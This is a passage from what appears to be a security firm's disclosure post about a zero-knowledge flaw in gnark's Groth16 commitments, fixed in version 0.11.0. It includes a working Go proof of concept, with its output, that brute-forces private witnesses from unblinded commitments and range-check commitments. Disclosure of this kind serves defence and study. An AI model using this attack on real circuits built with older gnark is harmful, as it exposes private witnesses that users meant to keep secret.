	if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
		return nil, fmt.Errorf("expected a pointer to a struct")
	}

	// Access the 'basis' field
	basisField := commitmentPkValue.Elem().FieldByName("basis")
	if !basisField.IsValid() {
		return nil, fmt.Errorf("field 'basis' not found")
	}

	if !basisField.CanInterface() {
		// To access an unexported field, we need to bypass safety
		basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
	}

	basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
	if !ok {
		return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
	}

	return basisFieldConcrete, nil
}

The output of running the above program is as follows:

24:12 INF compiling circuit
24:12 INF parsed circuit inputs nbPublic=0 nbSecret=1
24:12 INF building constraint builder nbConstraints=2
24:12 DBG constraint system solver done nbConstraints=2 took=0.692767
24:12 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=2 took=2.056221
Commitment equal to secret times commitment key basis element:  true
24:12 DBG verifier done backend=groth16 curve=bn254 took=3.246638

Range Checks in gnark

While commitments can be used directly in gnark, the most common way a gnark circuit might use commitments is via the standard library’s range checker, which uses commitments internally. Recall the example of a circuit proving knowledge of a decomposition of a number into nontrivial factors that we discussed at the start of the article. In that circuit, the constraints were defined as follows:

func (circuit *ExampleCircuit) Define(api frontend.API) error {
	api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
	api.AssertIsDifferent(circuit.A, 0)                         // A != 0
	api.AssertIsDifferent(circuit.A, 1)                         // A != 1
	api.AssertIsDifferent(circuit.B, 0)                         // B != 0
	api.AssertIsDifferent(circuit.B, 1)                         // B != 1
	rangeChecker := rangecheck.New(api)
	rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
	rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
	return nil
}

Here, we already used a range check to check that the two factors are values that are at most bitnum bits wide. Such range checks are used quite often when writing circuits.

It is beyond the scope of this article to describe how the range checks in the gnark standard library work, which involves lookups using the log-derivative argument↗, which in turn uses commitments. What is important for us here is what is committed, which can be described as follows.

When we perform a range check only for a single value $x$ , then $x$ is split up into digits to a basis that is a power of two, or in other words, we consider the binary representation of $x$ and split the bits into limbs that have a certain limb width $\lambda$ . Let us assume the resulting value has base- $2^\lambda$ digits (i.e., limbs) $x_0, \dots, x_k$ , ordered from least to most significant. We also need counts of how often limbs appear. Let $c_0, \dots, c_{2^\lambda - 1}$ be the counts so that $c_i$ is equal to the number of limbs $x_0, \dots x_k$ that are equal to $i$ . Then what will be committed will be $\left(x_0, \dots, x_k, c_0, \dots, c_{2^\lambda - 1}\right)$ .

When there is more than one range check, then all range checks will share one commitment. The values committed to will be the concatenation of the limbs for the individual range checks, followed by the joint counts. So counts only occur once and cover all limbs from all range checks.

To make an example, say $\lambda=2$ , and we range check $x=47$ and $y=123$ to be at most eight bits wide. As $47 = 3 + 3\cdot 4 + 2\cdot 4^2$ , the limbs for $x$ will be $\left(3, 3, 2, 0\right)$ . For $y$ , the limbs will be $\left(3, 2, 3, 1\right)$ . The counts will be $\left(1, 1, 2, 4\right)$ . So the values committed will be $\left(3, 3, 2, 0, 3, 2, 3, 1, 1, 1, 2, 4\right)$ .

The following proof of concept contains the same circuit as the one for the factoring statement we discussed at the start of the article, though we added an additional commitment to each of the two private witnesses. We use bitnum = 8 and set $A$ and $B$ to random eight-bit values, setting $N = A\cdot B$ to satisfy the circuit constraints. After the proof has been created, we first use knowledge of the public instance $N$ to find all pairs $(A',B')$ that satisfy all constraints. Usually, there will be more than one option. What the zero-knowledge property means is that, only knowing the proof (and the setup data, including the proving key), it is supposed to be impossible to learn anything more about the actual values $(A,B)$ used by the prover other than that the pair is an element of the list of all possible assignments satisfying the circuit constraints that was just mentioned.

In the proof of concept code, we then first use the commitments to the two private witnesses to individually extract their value, in a manner similar to the example from the previous subsection, though searching the entire search space of numbers up to bitnum-bits wide. We then use the commitment from the two range constraints to again recover $A$ and $B$ . This demonstrates how it is possible to recover private witnesses through range checks.

In practice, this attack will only be feasible if the search space is small enough. Given that all range checks share a single commitment, it is likely that most larger circuits, even if individual range checks are done on circuit variables with only a limited space of possible values, perform a sufficient amount of range checks to make the search space intractably large to perform this attack.

package main

import (
	"fmt"
	"log"
	"math/big"
	"math/rand"
	"reflect"
	"unsafe"

	"github.com/consensys/gnark-crypto/ecc"
	"github.com/consensys/gnark-crypto/ecc/bn254"
	"github.com/consensys/gnark-crypto/ecc/bn254/fr"
	"github.com/consensys/gnark/backend/groth16"
	groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
	"github.com/consensys/gnark/frontend"
	"github.com/consensys/gnark/frontend/cs/r1cs"
	"github.com/consensys/gnark/std/rangecheck"
)

const bitnum = 8

// Here we define which circuit variables our circuit will have.
type ExampleCircuit struct {
	A frontend.Variable // Private witness
	B frontend.Variable // Private witness
	N frontend.Variable `gnark:",public"` // Public instance
}

// This function defines the constraints for our circuit
func (circuit *ExampleCircuit) Define(api frontend.API) error {
	api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
	api.AssertIsDifferent(circuit.A, 0)                         // A != 0
	api.AssertIsDifferent(circuit.A, 1)                         // A != 1
	api.AssertIsDifferent(circuit.B, 0)                         // B != 0
	api.AssertIsDifferent(circuit.B, 1)                         // B != 1
	// We commit both private witnesses individually
	commitCompiler, ok := api.Compiler().(frontend.Committer)
	if !ok {
		return fmt.Errorf("compiler does not commit")
	}
	_, err := commitCompiler.Commit(circuit.A)
	if err != nil {
		return err
	}
	_, err = commitCompiler.Commit(circuit.B)
	if err != nil {
		return err
	}
	// The following two range checks will together result in one more commitment
	rangeChecker := rangecheck.New(api)
	rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
	rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
	return nil
}

func main() {
	// Compiles our circuit into a R1CS constraint system
	var circuit ExampleCircuit
	ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit)

	// Groth16 setup, generating the proving key and verification key
	pk, vk, _ := groth16.Setup(ccs)

	// Witness definition
	secret_a := rand.Int63n(1 << bitnum)
	secret_b := rand.Int63n(1 << bitnum)
	n := secret_a * secret_b
	fmt.Printf("\nUsing private witnesses a=%d, b=%d, with n=%d\n\n", secret_a, secret_b, n)
	assignment := ExampleCircuit{A: secret_a, B: secret_b, N: n}
	witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField())
	publicInstances, _ := witness.Public()

	// Proving
	proof, _ := groth16.Prove(ccs, pk, witness)

	// Verifying
	groth16.Verify(proof, vk, publicInstances)

	// Converting proving key and proof to concrete types
	pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
	if !ok {
		log.Fatal("unexpected type for proving key")
	}
	proofConcrete, ok := proof.(*groth16_bn254.Proof)
	if !ok {
		log.Fatal("unexpected type for proof")
	}

	// We first brute-force the search space to find all pairs (a,b) that are possible solutions of the constraints imposed by the circuit, given that we know n.
	// The zero-knowledge property with regards to the proof implies that it should be impossible with only knowledge of the proof (and proving key) to find out anything additional about a and b except that (a,b) is among the found pairs.
	fmt.Println("\nFinding all pairs (a,b) so that a*b =", n)
	for guess_a := int64(0); guess_a < 1<<bitnum; guess_a++ {
		for guess_b := int64(0); guess_b < 1<<bitnum; guess_b++ {
			if guess_a*guess_b == n {
				fmt.Println("Found a = ", guess_a, ", b =", guess_b)
			}
		}
	}

	// We now use the individual commitments to brute-force the exact values of a and b
	println("\nSearching for secrets by using the solo commitments")
	var guess_test bn254.G1Affine
	basisPoints, err := getBasisField(&pkConcrete.CommitmentKeys[0])
	if err != nil {
		panic(err)
	}
	for guess := int64(0); guess < 1<<bitnum; guess++ {
		guess_test.ScalarMultiplication(&basisPoints[0], big.NewInt(guess))
		if guess_test == proofConcrete.Commitments[0] {
			fmt.Println("Found secret a using the solo commitment: ", guess)
		}
	}

	basisPoints, err = getBasisField(&pkConcrete.CommitmentKeys[1])
	if err != nil {
		panic(err)
	}
	for guess := int64(0); guess < 1<<bitnum; guess++ {
		guess_test.ScalarMultiplication(&basisPoints[0], big.NewInt(guess))
		if guess_test == proofConcrete.Commitments[1] {
			fmt.Println("Found secret b using the solo commitment: ", guess)
		}
	}

	// In practice, range checks are the most likely use through which circuits have commitments. We demonstrate here how to recover (a,b) using the commitment arising from the range checks.
	println("\nSearching for secrets using the range check commitment")
	basisPoints, err = getBasisField(&pkConcrete.CommitmentKeys[2])
	if err != nil {
		panic(err)
	}
	for guess_a := int64(2); guess_a < 1<<bitnum; guess_a++ {
		for guess_b := int64(2); guess_b < 1<<bitnum; guess_b++ {
			// We first get the base 4 limbs and limb counts for a and b separately
			guess_list_a, counts_a := NumberToPartsAndCounts(big.NewInt(guess_a))
			guess_list_b, counts_b := NumberToPartsAndCounts(big.NewInt(guess_b))
			// The limb lists are just concatenated...
			guess_list := append(guess_list_a[:], guess_list_b[:]...)
			// ...but the counts need to be added.
			counts := make([]*big.Int, 4)
			for i := range 4 {
				counts[i] = big.NewInt(counts_a[i] + counts_b[i])
			}
			guess_complete := append(guess_list, counts...)
			guess_test, err = MultiScalarProduct(basisPoints, guess_complete)
			if err != nil {
				log.Fatal("MultiScalarProduct failed: ", err)
			}
			if guess_test == proofConcrete.Commitments[2] {
				fmt.Printf("\nFound secrets using the range check commitment: a = %d, b = %d\n", guess_a, guess_b)
			}
		}
	}

}

// Splits num into base-4 limbs and returns them in little-endian order as parts.
// It also returns counts, which contain how often each value from 0 to 3 occurs as a base-4 limb.
func NumberToPartsAndCounts(num *big.Int) (parts [bitnum / 2]*big.Int, counts [4]int64) {
	base := new(big.Int).Lsh(big.NewInt(1), uint(2))
	tmp := new(big.Int).Set(num)

	for i := int64(0); i < bitnum/2; i++ {
		scratch := big.NewInt(0)
		scratch.Mod(tmp, base)
		tmp.Rsh(tmp, uint(2))
		parts[i] = scratch
		counts[scratch.Int64()]++
	}
	return
}

// Wrapper to compute a multi-scalar product
func MultiScalarProduct(points []bn254.G1Affine, scalars []*big.Int) (bn254.G1Affine, error) {
	if len(points) != len(scalars) {
		return bn254.G1Affine{}, fmt.Errorf("points and scalars must have the same length")
	}

	// Convert []*big.Int to []fr.Element
	convertedScalars := make([]fr.Element, len(scalars))
	for i, scalar := range scalars {
		convertedScalars[i].SetBigInt(scalar)
	}

	// Setup MultiExpConfig
	config := ecc.MultiExpConfig{
		NbTasks: 1,
	}

	// Call the MultiExp method
	var result bn254.G1Affine
	_, err := result.MultiExp(points, convertedScalars, config)
	if err != nil {
		return bn254.G1Affine{}, err
	}

	return result, nil
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
	// Reflect on the pointer
	commitmentPkValue := reflect.ValueOf(commitmentPk)

	if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
		return nil, fmt.Errorf("expected a pointer to a struct")
	}

	// Access the 'basis' field
	basisField := commitmentPkValue.Elem().FieldByName("basis")
	if !basisField.IsValid() {
		return nil, fmt.Errorf("field 'basis' not found")
	}

	if !basisField.CanInterface() {
		// To access an unexported field, we need to bypass safety
		basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
	}

	basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
	if !ok {
		return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
	}

	return basisFieldConcrete, nil
}

An example output of the above program is as follows:

17:52:40 INF compiling circuit
17:52:40 INF parsed circuit inputs nbPublic=1 nbSecret=2
17:52:40 INF building constraint builder nbConstraints=21

Using private witnesses a=243, b=46, with n=11178

17:52:40 DBG constraint system solver done nbConstraints=21 took=2.178486
17:52:40 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=21 took=4.871332
17:52:40 DBG verifier done backend=groth16 curve=bn254 took=3.202103

Finding all pairs (a,b) so that a*b = 11178
Found a =  46 , b = 243
Found a =  54 , b = 207
Found a =  69 , b = 162
Found a =  81 , b = 138
Found a =  138 , b = 81
Found a =  162 , b = 69
Found a =  207 , b = 54
Found a =  243 , b = 46

Searching for secrets by using the solo commitments
Found secret a using the solo commitment:  243
Found secret b using the solo commitment:  46

Searching for secrets using the range check commitment

Found secrets using the range check commitment: a = 243, b = 46

Fix for the Zero-Knowledge Issue

The zero-knowledge issue has been fixed in gnark 0.11.0. For each commitment, an additional private witness is created and appended to the list of circuit variables to commit to. A random value will be assigned to that additional private witness, thereby making the contribution of this extra private witness to the commitment point act as a blinding summand, just like in Pedersen commitments.

How We Found the Vulnerabilities

We encountered gnark’s extension to Groth16 during an audit for one of our clients, Nebra↗, who is building an aggregator to reduce gas costs for on-chain verification of proofs. The audit concerned changes made to their halo2 circuits performing batched verification of Groth16 proofs, to also support gnark’s extension. Digging into the background for this extension, we found the zero-knowledge issue. Later, when working on an early draft for this blog post and attempting to describe why the extension is sound, we realized that this was not actually the case with more than one commitment present.

Timeline

May 27, 2024 — We started our audit for Nebra that involved support for gnark’s extension to Groth16.
May 30, 2024 — We found the zero-knowledge vulnerability.
May 31, 2024 — We informed gnark about the zero-knowledge vulnerability.
June 20, 2024 — We found the soundness vulnerability while writing an early draft of this article.
June 20, 2024 — We informed gnark about the soundness vulnerability.
August 22, 2024 — Zero-knowledge vulnerability was fixed in commit afda68a↗.
August 27, 2024 — Soundness vulnerability was fixed.
September 6, 2024 — Version 0.11.0↗ of gnark, including the fixes, was released.

About Us

Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.

Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.

This can be seen as follows. The map $\varphi\colon \mathbb{F}_p^k \to \mathbb{F}_p, \left(r_0, \dots, r_{k-1}\right) \mapsto \sum_{i=0}^{k-1} r_i \cdot f_i - \sum_{i=0}^{k-1} r_i \cdot g_i$ is a linear map of $\mathbb{F}_p$ vector spaces. We assumed that there is a $j$ for which $f_j \neq g_j$ , and one of the two values must be nonzero, which implies that $\varphi$ is not the zero map. Hence the image of $\varphi$ must have dimension $1$ , and so the kernel of $\varphi$ must have dimension $k-1$ by the rank-nullity theorem↗. But the kernel of $\varphi$ consists exactly of the tuples we were looking for, so the ratio we were looking for is $\frac{p^{k-1}}{p^k}=\frac{1}{p}$ . ↩
It is also possible to commit to public instances in gnark’s implementation, but we do not consider that case to simplify the exposition. ↩
For those who are familiar with the details of Groth16 — this must hold separately for the two factors as well as the linear term in the quadratic arithmetic program that the Groth16 scheme is based upon and into which the higher-level commitments one might define in gnark are compiled to. Essentially, this results in a linear relation holding for the polynomials $u_j$ , for $v_j$ , and for $w_j$ (Groth16’s notation), which implies that linear relation also after evaluating at $x$ and hence for $L_j$ . ↩

Two Vulnerabilities in gnark's Groth16 Proofs

What Is gnark?

Circuit Variables and Constraints

Arithmetic Modulo $p$

Range Checks

Proving Scheme

Running Setup, Prover, and Verifier

The Zero-Knowledge Property

Groth16 Proofs

Setup

Proving

Verifying

gnark’s Extension to Groth16 Proofs

Random Linear Combinations and the Schwartz-Zippel Lemma

Splitting Out a Commitment

Preventing Fungibility of the Commitments Using Separate Proofs of Knowledge

The Soundness Vulnerability

Proofs of Knowledge of Coefficients of a Linear Combination

Batching the Proofs of Knowledge

Proofs of Knowledge for Commitments in gnark up to Version 0.10.0

The Soundness Vulnerability: Fungibility of Commitments

Proof of Concept

The Fix

Commitment Schemes

The Zero-Knowledge Vulnerability

The Binding Property of the Commitments

The Hiding Property of the Commitments

Range Checks in gnark

Fix for the Zero-Knowledge Issue

How We Found the Vulnerabilities

Timeline

About Us

About us

What we do

Follow us

What Is gnark?​

Circuit Variables and Constraints​

Arithmetic Modulo ppp​

Range Checks​

Proving Scheme​

Running Setup, Prover, and Verifier​

The Zero-Knowledge Property​

Groth16 Proofs​

Setup​

Proving​

Verifying​

gnark’s Extension to Groth16 Proofs​

Random Linear Combinations and the Schwartz-Zippel Lemma​

Splitting Out a Commitment​

Preventing Fungibility of the Commitments Using Separate Proofs of Knowledge​

The Soundness Vulnerability​

Proofs of Knowledge of Coefficients of a Linear Combination​

Batching the Proofs of Knowledge​

Proofs of Knowledge for Commitments in gnark up to Version 0.10.0​

The Soundness Vulnerability: Fungibility of Commitments​

Proof of Concept​

The Fix​

Commitment Schemes​

The Zero-Knowledge Vulnerability​

The Binding Property of the Commitments​

The Hiding Property of the Commitments​

Range Checks in gnark​

Fix for the Zero-Knowledge Issue​

How We Found the Vulnerabilities​

Timeline​

About Us​

Endnotes​

What Is gnark?

Circuit Variables and Constraints

Arithmetic Modulo $p$

Range Checks

Proving Scheme

Running Setup, Prover, and Verifier

The Zero-Knowledge Property

Groth16 Proofs

Setup

Proving

Verifying

gnark’s Extension to Groth16 Proofs

Random Linear Combinations and the Schwartz-Zippel Lemma

Splitting Out a Commitment

Preventing Fungibility of the Commitments Using Separate Proofs of Knowledge

The Soundness Vulnerability

Proofs of Knowledge of Coefficients of a Linear Combination

Batching the Proofs of Knowledge

Proofs of Knowledge for Commitments in gnark up to Version 0.10.0

The Soundness Vulnerability: Fungibility of Commitments

Proof of Concept

The Fix

Commitment Schemes

The Zero-Knowledge Vulnerability

The Binding Property of the Commitments

The Hiding Property of the Commitments

Range Checks in gnark

Fix for the Zero-Knowledge Issue

How We Found the Vulnerabilities

Timeline

About Us

Endnotes